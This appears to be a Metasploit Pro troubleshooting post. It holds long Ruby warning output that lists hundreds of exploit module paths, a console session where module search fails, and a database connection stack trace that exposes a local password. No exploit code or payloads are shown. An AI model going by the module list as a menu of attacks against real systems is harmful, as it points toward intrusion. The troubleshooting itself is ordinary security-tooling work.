modules/exploits/windows/browser/ask_shortformat.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/athocgov_completeinstallation.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/autodesk_idrop.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/aventail_epi_activex.rb:94: warning: assigned but unused variable - progid
modules/exploits/windows/browser/aventail_epi_activex.rb:123: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/awingsoft_web3d_bof.rb:87: warning: assigned but unused variable - p
modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb:72: warning: assigned but unused variable - p
modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb:75: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/barcode_ax49.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/browser/ca_brightstor_addcolumn.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ca_brightstor_addcolumn.rb:69: warning: assigned but unused variable - nops
modules/exploits/windows/browser/citrix_gateway_actx.rb:193: warning: shadowing outer local variable - cli
modules/exploits/windows/browser/citrix_gateway_actx.rb:133: warning: assigned but unused variable - p
modules/exploits/windows/browser/creative_software_cachefolder.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ea_checkrequirements.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/facebook_extractiptc.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/hpmqc_progcolor.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/browser/hyleos_chemviewx_activex.rb:74: warning: assigned but unused variable - progid
modules/exploits/windows/browser/ibmegath_getxmlvalue.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/ie_execcommand_uaf.rb:262: warning: assigned but unused variable - js
modules/exploits/windows/browser/ie_iscomponentinstalled.rb:57: warning: assigned but unused variable - p
modules/exploits/windows/browser/ie_unsafe_scripting.rb:84: warning: assigned but unused variable - var_stream
modules/exploits/windows/browser/java_basicservice_impl.rb:134: warning: assigned but unused variable - buf
modules/exploits/windows/browser/java_codebase_trust.rb:139: warning: assigned but unused variable - p
modules/exploits/windows/browser/java_docbase_bof.rb:97: warning: assigned but unused variable - p
modules/exploits/windows/browser/java_ws_arginject_altjvm.rb:128: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/java_ws_vmargs.rb:125: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/browser/kazaa_altnet_heap.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/lpviewer_url.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/mirc_irc_url.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:246: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:250: warning: assigned but unused variable - ffversion
modules/exploits/windows/browser/mozilla_attribchildremoved.rb:251: warning: assigned but unused variable - osversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:158: warning: assigned but unused variable - p
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:162: warning: assigned but unused variable - ffversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:163: warning: assigned but unused variable - osversion
modules/exploits/windows/browser/mozilla_nssvgvalue.rb:183: warning: assigned but unused variable - target
modules/exploits/windows/browser/mozilla_nstreerange.rb:147: warning: assigned but unused variable - spray_size
modules/exploits/windows/browser/mozilla_reduceright.rb:96: warning: character class has duplicated range: /Firefox\/3\.6\.[16|17]/
modules/exploits/windows/browser/ms06_013_createtextrange.rb:72: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_013_createtextrange.rb:81: warning: assigned but unused variable - xmlns
modules/exploits/windows/browser/ms06_055_vml_method.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_057_webview_setslice.rb:59: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms06_071_xml_core.rb:59: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb:359: warning: assigned but unused variable - buf
modules/exploits/windows/browser/ms08_053_mediaencoder.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb:80: warning: assigned but unused variable - vname
modules/exploits/windows/browser/ms08_078_xml_corruption.rb:104: warning: assigned but unused variable - trash
modules/exploits/windows/browser/ms09_002_memory_corruption.rb:86: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb:111: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms09_072_style_object.rb:97: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/ms10_002_aurora.rb:116: warning: assigned but unused variable - rand_html
modules/exploits/windows/browser/ms10_018_ie_behaviors.rb:158: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb:74: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb:79: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb:123: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb:199: warning: assigned but unused variable - js_net_dll
modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb:86: warning: (...) interpreted as grouped expression
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:95: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:128: warning: assigned but unused variable - headers
modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb:150: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/ms10_090_ie_css_clip.rb:161: warning: assigned but unused variable - p
modules/exploits/windows/browser/ms11_003_ie_css_import.rb:218: warning: assigned but unused variable - ret
modules/exploits/windows/browser/msvidctl_mpeg2.rb:111: warning: assigned but unused variable - p
modules/exploits/windows/browser/msvidctl_mpeg2.rb:114: warning: assigned but unused variable - allclsids
modules/exploits/windows/browser/mswhale_checkforupdates.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/nis2004_antispam.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_callbackurl.rb:95: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_callbackurl.rb:106: warning: assigned but unused variable - offset
modules/exploits/windows/browser/novelliprint_callbackurl.rb:115: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb:94: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_executerequest.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb:76: warning: assigned but unused variable - p
modules/exploits/windows/browser/novelliprint_getdriversettings.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/oracle_dc_submittoexpress.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/oracle_dc_submittoexpress.rb:74: warning: assigned but unused variable - fluff
modules/exploits/windows/browser/pcvue_func.rb:98: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/realplayer_cdda_uri.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_console.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_import.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/browser/realplayer_smil.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/roxio_cineplayer.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/softartisans_getdrivename.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/browser/trendmicro_extsetowner.rb:94: warning: assigned but unused variable - p
modules/exploits/windows/browser/trendmicro_extsetowner.rb:112: warning: assigned but unused variable - j_ret
modules/exploits/windows/browser/tumbleweed_filetransfer.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:115: warning: assigned but unused variable - type
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:134: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb:199: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/ultraoffice_httpupload.rb:78: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/verypdf_pdfview.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/browser/verypdf_pdfview.rb:71: warning: assigned but unused variable - nops
modules/exploits/windows/browser/webdav_dll_hijacker.rb:96: warning: assigned but unused variable - webdav
modules/exploits/windows/browser/webdav_dll_hijacker.rb:161: warning: assigned but unused variable - my_uri
modules/exploits/windows/browser/webex_ucf_newobject.rb:92: warning: assigned but unused variable - clsid
modules/exploits/windows/browser/winamp_ultravox.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/browser/winamp_ultravox.rb:64: warning: assigned but unused variable - res
modules/exploits/windows/browser/windvd7_applicationtype.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/browser/winzip_fileview.rb:76: warning: assigned but unused variable - p
modules/exploits/windows/browser/wmi_admintools.rb:137: warning: assigned but unused variable - pivot_str
modules/exploits/windows/browser/wmi_admintools.rb:155: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/wmi_admintools.rb:156: warning: assigned but unused variable - nops
modules/exploits/windows/browser/wmi_admintools.rb:161: warning: assigned but unused variable - progid
modules/exploits/windows/browser/xmplay_asx.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/dcerpc/ms05_017_msmq.rb:120: warning: assigned but unused variable - queue_plen
modules/exploits/windows/dcerpc/ms05_017_msmq.rb:141: warning: assigned but unused variable - response
modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb:279: warning: assigned but unused variable - response
modules/exploits/windows/dcerpc/ms07_065_msmq.rb:135: warning: assigned but unused variable - response
modules/exploits/windows/driver/netgear_wg111_beacon.rb:144: warning: assigned but unused variable - ret
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:145: warning: assigned but unused variable - name
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:156: warning: assigned but unused variable - mytargs
modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb:325: warning: assigned but unused variable - buf
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:112: warning: assigned but unused variable - webdav
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:134: warning: assigned but unused variable - headers
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb:156: warning: assigned but unused variable - my_uri
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:110: warning: assigned but unused variable - webdav
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:132: warning: assigned but unused variable - headers
modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb:154: warning: assigned but unused variable - my_uri
modules/exploits/windows/fileformat/adobe_cooltype_sing.rb:307: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_flashplayer_button.rb:221: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb:217: warning: assigned but unused variable - var_start
modules/exploits/windows/fileformat/adobe_jbig2decode.rb:67: warning: mismatched indentations at 'end' with 'def' at 20
modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb:207: warning: assigned but unused variable - open_action
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:582: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:582: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:601: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:601: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:610: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:610: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:625: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:625: warning: even though it seems like string literal
modules/exploits/windows/fileformat/adobe_reader_u3d.rb:540: warning: assigned but unused variable - site
modules/exploits/windows/fileformat/foxit_reader_filewrite.rb:86: warning: assigned but unused variable - file
modules/exploits/windows/fileformat/mcafee_showreport_exec.rb:129: warning: assigned but unused variable - my_uri
modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb:61: warning: assigned but unused variable - file_name
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: `-' after local variable is interpreted as binary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: even though it seems like unary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: `-' after local variable is interpreted as binary operator
modules/exploits/windows/firewall/blackice_pam_icq.rb:44: warning: even though it seems like unary operator
modules/exploits/windows/ftp/ability_server_stor.rb:78: warning: mismatched indentations at 'end' with 'def' at 15
modules/exploits/windows/ftp/leapftp_pasv_reply.rb:66: warning: assigned but unused variable - p
modules/exploits/windows/ftp/odin_list_reply.rb:90: warning: assigned but unused variable - nops
modules/exploits/windows/ftp/proftp_banner.rb:60: warning: assigned but unused variable - p
modules/exploits/windows/ftp/trellian_client_pasv.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/ftp/xftp_client_pwd.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/ftp/xlink_client.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/http/adobe_robohelper_authbypass.rb:89: warning: assigned but unused variable - data
modules/exploits/windows/http/altn_securitygateway.rb:126: warning: assigned but unused variable - res
modules/exploits/windows/http/belkin_bulldog.rb:59: warning: assigned but unused variable - c
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb:63: warning: assigned but unused variable - exe_fname
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb:114: warning: mismatched indentations at 'end' with 'if' at 110
modules/exploits/windows/http/edirectory_imonitor.rb:74: warning: assigned but unused variable - res
modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb:79: warning: assigned but unused variable - start
modules/exploits/windows/http/hp_power_manager_filename.rb:99: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:99: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:100: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:100: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:102: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:102: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:103: warning: `%' after local variable is interpreted as binary operator
modules/exploits/windows/http/hp_power_manager_filename.rb:103: warning: even though it seems like string literal
modules/exploits/windows/http/hp_power_manager_filename.rb:92: warning: assigned but unused variable - request
modules/exploits/windows/http/hp_power_manager_login.rb:73: warning: assigned but unused variable - req
modules/exploits/windows/http/httpdx_handlepeer.rb:124: warning: assigned but unused variable - res
modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb:84: warning: assigned but unused variable - res
modules/exploits/windows/http/ibm_tpmfosd_overflow.rb:220: warning: assigned but unused variable - res
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb:66: warning: assigned but unused variable - c
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb:77: warning: assigned but unused variable - res
modules/exploits/windows/http/nowsms.rb:59: warning: assigned but unused variable - c
modules/exploits/windows/http/nowsms.rb:65: warning: assigned but unused variable - res
modules/exploits/windows/http/osb_uname_jlist.rb:63: warning: assigned but unused variable - exe_fname
modules/exploits/windows/http/sambar6_search_results.rb:96: warning: `<<' after local variable is interpreted as binary operator
modules/exploits/windows/http/sambar6_search_results.rb:96: warning: even though it seems like here document
modules/exploits/windows/http/sapdb_webtools.rb:75: warning: assigned but unused variable - res
modules/exploits/windows/http/sybase_easerver.rb:77: warning: assigned but unused variable - res
modules/exploits/windows/http/sysax_create_folder.rb:186: warning: assigned but unused variable - r
modules/exploits/windows/http/trackercam_phparg_overflow.rb:90: warning: assigned but unused variable - c
modules/exploits/windows/http/trackercam_phparg_overflow.rb:97: warning: assigned but unused variable - res
modules/exploits/windows/http/trendmicro_officescan.rb:96: warning: assigned but unused variable - len
modules/exploits/windows/http/trendmicro_officescan.rb:100: warning: assigned but unused variable - res
modules/exploits/windows/http/xampp_webdav_upload_php.rb:54: warning: assigned but unused variable - c
modules/exploits/windows/iis/ms02_065_msadc.rb:92: warning: assigned but unused variable - res
modules/exploits/windows/iis/msadc.rb:126: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/iis/msadc.rb:126: warning: even though it seems like unary operator
modules/exploits/windows/iis/msadc.rb:199: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/iis/msadc.rb:199: warning: even though it seems like unary operator
modules/exploits/windows/iis/msadc.rb:409: warning: assigned but unused variable - res
modules/exploits/windows/imap/eudora_list.rb:84: warning: assigned but unused variable - build
modules/exploits/windows/isapi/ms00_094_pbserver.rb:81: warning: assigned but unused variable - res
modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb:94: warning: assigned but unused variable - res
modules/exploits/windows/isapi/rsa_webagent_redirect.rb:95: warning: assigned but unused variable - r
modules/exploits/windows/isapi/w3who_query.rb:118: warning: assigned but unused variable - r
modules/exploits/windows/license/calicserv_getconfig.rb:78: warning: assigned but unused variable - banner
modules/exploits/windows/license/flexnet_lmgrd_bof.rb:181: warning: assigned but unused variable - t
modules/exploits/windows/local/ms10_092_schelevator.rb:99: warning: assigned but unused variable - upload_fn
modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb:61: warning: assigned but unused variable - p
modules/exploits/windows/misc/eureka_mail_err.rb:75: warning: assigned but unused variable - p
modules/exploits/windows/misc/fb_svc_attach.rb:81: warning: assigned but unused variable - op_attach
modules/exploits/windows/misc/fb_svc_attach.rb:84: warning: assigned but unused variable - op_create
modules/exploits/windows/misc/ibm_tsm_cad_ping.rb:91: warning: assigned but unused variable - buf
modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb:107: warning: assigned but unused variable - rca_port
modules/exploits/windows/misc/ib_svc_attach.rb:126: warning: assigned but unused variable - op_attach
modules/exploits/windows/misc/ib_svc_attach.rb:129: warning: assigned but unused variable - op_create
modules/exploits/windows/misc/mirc_privmsg_server.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/misc/ms07_064_sami.rb:57: warning: assigned but unused variable - p
modules/exploits/windows/misc/poppeeper_date.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/misc/poppeeper_uidl.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/misc/realtek_playlist.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/misc/talkative_response.rb:67: warning: assigned but unused variable - p
modules/exploits/windows/misc/ufo_ai.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/misc/wireshark_lua.rb:134: warning: assigned but unused variable - my_uri
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb:266: warning: (...) interpreted as grouped expression
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb:440: warning: assigned but unused variable - idx
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb:268: warning: (...) interpreted as grouped expression
modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb:440: warning: assigned but unused variable - idx
modules/exploits/windows/mysql/scrutinizer_upload_exec.rb:187: warning: assigned but unused variable - res
modules/exploits/windows/nntp/ms05_030_nntp.rb:71: warning: assigned but unused variable - p
modules/exploits/windows/novell/groupwisemessenger_client.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/novell/groupwisemessenger_client.rb:72: warning: assigned but unused variable - rand_3
modules/exploits/windows/novell/zenworks_desktop_agent.rb:79: warning: assigned but unused variable - ack
modules/exploits/windows/postgres/postgres_payload.rb:113: warning: assigned but unused variable - msg
modules/exploits/windows/scada/igss9_misc.rb:159: warning: assigned but unused variable - res
modules/exploits/windows/scada/moxa_mdmtool.rb:65: warning: assigned but unused variable - p
modules/exploits/windows/smb/ms04_011_lsass.rb:149: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms04_031_netdde.rb:91: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms07_029_msdns_zonename.rb:262: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms08_067_netapi.rb:1135: warning: assigned but unused variable - module_name
modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb:138: warning: assigned but unused variable - e
modules/exploits/windows/smb/ms10_061_spoolss.rb:125: warning: assigned but unused variable - scomm
modules/exploits/windows/smb/ms10_061_spoolss.rb:79: warning: assigned but unused variable - login_time
modules/exploits/windows/smb/ms10_061_spoolss.rb:108: warning: assigned but unused variable - lerror
modules/exploits/windows/smb/ms10_061_spoolss.rb:108: warning: assigned but unused variable - lcount
modules/exploits/windows/smb/ms10_061_spoolss.rb:278: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:344: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:376: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:398: warning: assigned but unused variable - response
modules/exploits/windows/smb/ms10_061_spoolss.rb:420: warning: assigned but unused variable - response
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:94: warning: assigned but unused variable - trans2
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:120: warning: assigned but unused variable - heap_pointer_leaked
modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb:162: warning: assigned but unused variable - trans2
modules/exploits/windows/smb/smb_relay.rb:318: warning: assigned but unused variable - dcerpc
modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb:89: warning: assigned but unused variable - trans2
modules/exploits/windows/ssh/securecrt_ssh1.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/ssl/ms04_011_pct.rb:142: warning: assigned but unused variable - greeting
modules/exploits/windows/tftp/distinct_tftp_traversal.rb:75: warning: assigned but unused variable - ret
modules/exploits/windows/tftp/netdecision_tftp_traversal.rb:75: warning: assigned but unused variable - ret
modules/exploits/windows/tftp/tftpserver_wrq_bof.rb:90: warning: `+' after local variable is interpreted as binary operator
modules/exploits/windows/tftp/tftpserver_wrq_bof.rb:90: warning: even though it seems like unary operator
modules/exploits/windows/vnc/realvnc_client.rb:68: warning: assigned but unused variable - p
modules/exploits/windows/vnc/ultravnc_client.rb:69: warning: assigned but unused variable - p
modules/exploits/windows/vnc/ultravnc_viewer_bof.rb:62: warning: assigned but unused variable - p
modules/exploits/windows/vnc/winvnc_http_get.rb:70: warning: assigned but unused variable - res
modules/exploits/windows/vnc/winvnc_http_get.rb:79: warning: mismatched indentations at 'end' with 'class' at 15

msfpro console search can not search modules

[root@devel ~]# service metasploit status;msfpro
metasploit is running
postgresql already running
prosvc is running
nginx is running
[*] Please wait while the Metasploit Pro Console initializes...

[*] Starting Metasploit Console...

             _---------.
         .' #######   ;."

.---,. ;@ @@; .---,.. ." @@@@@'.,'@@ @@@@@',.'@@@@ ". '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; .@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ . ;' |@@@@ @@@ @ . ' @@@ @@ @@ , .@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit!
;@'. *****,." |--- _____________/
'(.,...."/

   =[ metasploit v4.4.0-dev [core:4.4 api:1.0]

-- --=[ 889 exploits - 516 auxiliary - 152 post
-- --=[ 251 payloads - 28 encoders - 8 nops

[*] Successfully loaded plugin: pro
msf > search jboss

msf > exit
[root@devel ~]# service metasploit stop;msfpro
metasploit is stopped
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
LOG: unexpected EOF on client connection
prosvc is stopped
nginx is stopped
LOG: received smart shutdown request
LOG: autovacuum launcher shutting down
LOG: shutting down
LOG: database system is shut down
/opt/metasploit-4.3.0/postgresql/scripts/ctl.sh : postgresql stopped
[*] Please wait while the Metasploit Pro Console initializes...

[*] Starting Metasploit Console...
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 7337?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 7337?
{"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"fd401d58", "port"=>7337, "host"=>"localhost", "pool"=>256, "timeout"=>5} ["/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:in initialize'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:innew'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:1194:in connect'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:329:ininitialize'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:28:in new'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/postgresql_adapter.rb:28:inpostgresql_connection'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:277:in new_connection'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:287:incheckout_new_connection'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:58:in block (2 levels) in checkout'", "/opt/metasploit-4.3.0/ruby/lib/ruby/1.9.1/monitor.rb:211:inmon_synchronize'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:53:in block in checkout'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:52:inloop'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:52:in checkout'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.2/lib/active_record/connection_adapters/abstract/connection_pool.rb:95:inconnection'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/patches/active_record.rb:21:in with_connection'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/db.rb:204:indefault_workspace'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/core/db_manager.rb:203:in connect'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/msf/ui/console/driver.rb:194:ininitialize'", "/opt/metasploit-4.3.0/apps/pro/msf3/msfconsole:142:in new'", "/opt/metasploit-4.3.0/apps/pro/msf3/msfconsole:142:in<top (required)>'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:in load'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:inblock in load'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:236:in load_dependency'", "/opt/metasploit-4.3.0/apps/pro/msf3/lib/gemcache/ruby/1.9.1/gems/activesupport-3.2.2/lib/active_support/dependencies.rb:245:inload'", "/opt/metasploit-4.3.0/apps/pro/engine/msfpro:189:in `

'"]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
